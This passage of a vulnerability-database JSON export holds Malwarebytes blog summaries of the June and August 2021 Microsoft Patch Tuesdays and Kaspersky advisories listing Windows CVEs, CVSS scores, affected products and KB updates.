flaw](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-09T14:50:52", "type": "malwarebytes", "title": "Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0507", "CVE-2021-27602", "CVE-2021-27610", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T14:50:52", "id": "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T14:38:54", "description": "The sheer number of patches (44 security vulnerabilities) should be enough to scare us, but unfortunately we have gotten used to those numbers. In fact, 44 is a low number compared to what we have seen on recent Patch Tuesdays. So what are the most notable vulnerabilities that were patched.\n\n * One actively exploited vulnerability\n * One vulnerability that has a CVSS score of 9.9 out of 10\n * And yet another attempt to fix PrintNightmare\n\nLet\u2019s go over these worst cases to get an idea of what we are up against.\n\n### CVEs\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n### Actively exploited\n\n[CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) is an [elevation of privilege (EoP)](<https://blog.malwarebytes.com/glossary/privilege-escalation/>) vulnerability in the Windows Update Medic Service. The Windows Update Medic Service is a background service that was introduced with Windows 10 and handles the updating process. Its only purpose is to repair the Windows Update service so that your PC can continue to receive updates unhindered. Besides on Windows 10 it also runs on Windows Server 2019. According to Microsoft CVE-2021-36948 is being actively exploited, but it is not aware of exploit code publicly available. [Reportedly](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>), the exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversaries toolbox. The bug is only locally exploitable, but local elevation of privilege is exactly what ransomware gangs will be looking to do after breaching a network, for example.\n\n### 9.9 out of 10\n\n[CVE-2021-34535](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34535>) is a [Remote Code Execution (RCE)](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>) vulnerability in Windows TCP/IP. This is remotely exploitable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. An attacker could send a specially crafted TCPIP packet to its host. This vulnerability exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\nThis vulnerability received a CVSS score of 9.9 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\n### 9.8 out of 10\n\nAnother high scorer is [CVE-2021-26432](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26432>), an RCE in the Windows Services for NFS ONCRPC XDR Driver. Open Network Computing (ONC) Remote Procedure Call (RPC) is a remote procedure call system. ONC was originally developed by Sun Microsystems. The NFS protocol is independent of the type of operating system, network architecture, and transport protocols. The Windows service for the driver makes sure that Windows computers can use this protocol. This vulnerability got a high score because it is known to be easy to exploit and can be initiated remotely.\n\n### More RDP\n\n[CVE-2021-34535](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34535>) is an RCE in the Remote Desktop Client. Microsoft lists two exploit scenarios for this vulnerability:\n\n * In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with the vulnerable Remote Desktop Client.\n * In the case of Hyper-V, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer when a victim running on the host connects to the attacking Hyper-V guest.\n\nSince this is a client-side vulnerability, an attacker would have to convince a user to authenticate to a malicious RDP server, where the server could then trigger the bug on the client side. Combined with other RDP weaknesses however, this vulnerability would be easy to chain into a full system take-over.\n\n### Never-ending nightmare of PrintNightmare\n\nThe Print Spooler service was subject to yet more patching. The researchers behind PrintNightmare predicted that it would be a fertile ground for further discoveries, and they seem to be right. I\u2019d be tempted to advise Microsoft to start from scratch instead of patching patches on a very old chunk of code.\n\n[CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) an RCE vulnerability in Windows Print Spooler. A vulnerability that was publicly disclosed, which may be related to several bugs in Print Spooler that were identified by researchers over the past few months (presumably PrintNightmare).\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) are RCE vulnerabilities that could allow attackers to run arbitrary code with SYSTEM privileges.\n\nMicrosoft said the Print Spooler patch it pushed this time should address all publicly documented security problems with the service. In an unusual step, it has made a breaking change: \u201cToday we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges.\u201d\n\nTo be continued, we suspect.\n\nThe post [PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T12:16:17", "type": "malwarebytes", "title": "PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26432", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36948"], "modified": "2021-08-11T12:16:17", "id": "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-05-27T14:59:57", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows RT 8.1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003695](<http://support.microsoft.com/kb/5003695>) \n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003661](<http://support.microsoft.com/kb/5003661>) \n[5003667](<http://support.microsoft.com/kb/5003667>) \n[5003694](<http://support.microsoft.com/kb/5003694>) \n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>) \n[5023755](<http://support.microsoft.com/kb/5023755>) \n[5023754](<http://support.microsoft.com/kb/5023754>) \n[5023759](<http://support.microsoft.com/kb/5023759>) \n[5023769](<http://support.microsoft.com/kb/5023769>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12198 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-03-20T00:00:00", "id": "KLA12198", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12198/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:59:49", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nVP9 Video Extensions \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31975](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31975>) \n[CVE-2021-31967](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31967>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-31972](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31972>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31976](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31976>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31970](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31970>) \n[CVE-2021-33739](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33739>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-31951](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31951>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31952](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31952>) \n[CVE-2021-31974](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31974>) \n[CVE-2021-31955](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31955>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31960](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31960>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31969](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31969>) \n[CVE-2021-31977](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31977>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-31956](<https://vulners.com/cve/CVE-2021-31956>)9.3Critical \n[CVE-2021-31973](<https://vulners.com/cve/CVE-2021-31973>)4.6Warning \n[CVE-2021-33742](<https://vulners.com/cve/CVE-2021-33742>)6.8High \n[CVE-2021-31954](<https://vulners.com/cve/CVE-2021-31954>)7.2High \n[CVE-2021-31201](<https://vulners.com/cve/CVE-2021-31201>)4.6Warning \n[CVE-2021-31199](<https://vulners.com/cve/CVE-2021-31199>)4.6Warning \n[CVE-2021-1675](<https://vulners.com/cve/CVE-2021-1675>)9.3Critical \n[CVE-2021-31953](<https://vulners.com/cve/CVE-2021-31953>)4.6Warning \n[CVE-2021-31968](<https://vulners.com/cve/CVE-2021-31968>)5.0Critical \n[CVE-2021-31958](<https://vulners.com/cve/CVE-2021-31958>)6.8High \n[CVE-2021-31971](<https://vulners.com/cve/CVE-2021-31971>)6.8High \n[CVE-2021-26414](<https://vulners.com/cve/CVE-2021-26414>)4.3Warning \n[CVE-2021-31959](<https://vulners.com/cve/CVE-2021-31959>)6.8High \n[CVE-2021-31962](<https://vulners.com/cve/CVE-2021-31962>)7.5Critical \n[CVE-2021-31975](<https://vulners.com/cve/CVE-2021-31975>)7.8Critical \n[CVE-2021-31967](<https://vulners.com/cve/CVE-2021-31967>)6.8High \n[CVE-2021-31972](<https://vulners.com/cve/CVE-2021-31972>)2.1Warning \n[CVE-2021-31976](<https://vulners.com/cve/CVE-2021-31976>)7.8Critical \n[CVE-2021-31970](<https://vulners.com/cve/CVE-2021-31970>)2.1Warning \n[CVE-2021-33739](<https://vulners.com/cve/CVE-2021-33739>)4.6Warning \n[CVE-2021-31951](<https://vulners.com/cve/CVE-2021-31951>)7.2High \n[CVE-2021-31952](<https://vulners.com/cve/CVE-2021-31952>)7.2High \n[CVE-2021-31974](<https://vulners.com/cve/CVE-2021-31974>)5.0Critical \n[CVE-2021-31955](<https://vulners.com/cve/CVE-2021-31955>)2.1Warning \n[CVE-2021-31960](<https://vulners.com/cve/CVE-2021-31960>)2.1Warning \n[CVE-2021-31969](<https://vulners.com/cve/CVE-2021-31969>)4.6Warning \n[CVE-2021-31977](<https://vulners.com/cve/CVE-2021-31977>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003681](<http://support.microsoft.com/kb/5003681>) \n[5003637](<http://support.microsoft.com/kb/5003637>) \n[5003671](<http://support.microsoft.com/kb/5003671>) \n[5003696](<http://support.microsoft.com/kb/5003696>) \n[5003646](<http://support.microsoft.com/kb/5003646>) \n[5003638](<http://support.microsoft.com/kb/5003638>) \n[5003697](<http://support.microsoft.com/kb/5003697>) \n[5003635](<http://support.microsoft.com/kb/5003635>) \n[5003687](<http://support.microsoft.com/kb/5003687>) \n[5014699](<http://support.microsoft.com/kb/5014699>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014746](<http://support.microsoft.com/kb/5014746>) \n[5014701](<http://support.microsoft.com/kb/5014701>) \n[5023752](<http://support.microsoft.com/kb/5023752>) \n[5023764](<http://support.microsoft.com/kb/5023764>) \n[5023756](<http://support.microsoft.com/kb/5023756>) \n[5023765](<http://support.microsoft.com/kb/5023765>) \n[5023698](<http://support.microsoft.com/kb/5023698>) \n[5023702](<http://support.microsoft.com/kb/5023702>) \n[5023696](<http://support.microsoft.com/kb/5023696>) \n[5023697](<http://support.microsoft.com/kb/5023697>) \n[5023705](<http://support.microsoft.com/kb/5023705>) \n[5023787](<http://support.microsoft.com/kb/5023787>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12202 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-05-04T00:00:00", "id": "KLA12202", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12202/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:57:59", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36948](<https://nvd.nist.gov/vuln/detail/CVE-2021-36948>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-26433](<https://nvd.nist.gov/vuln/detail/CVE-2021-26433>) \n[CVE-2021-36945](<https://nvd.nist.gov/vuln/detail/CVE-2021-36945>) \n[CVE-2021-26432](<https://nvd.nist.gov/vuln/detail/CVE-2021-26432>) \n[CVE-2021-36926](<https://nvd.nist.gov/vuln/detail/CVE-2021-36926>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34487](<https://nvd.nist.gov/vuln/detail/CVE-2021-34487>) \n[CVE-2021-34530](<https://nvd.nist.gov/vuln/detail/CVE-2021-34530>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n[CVE-2021-34534](<https://nvd.nist.gov/vuln/detail/CVE-2021-34534>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34486](<https://nvd.nist.gov/vuln/detail/CVE-2021-34486>) 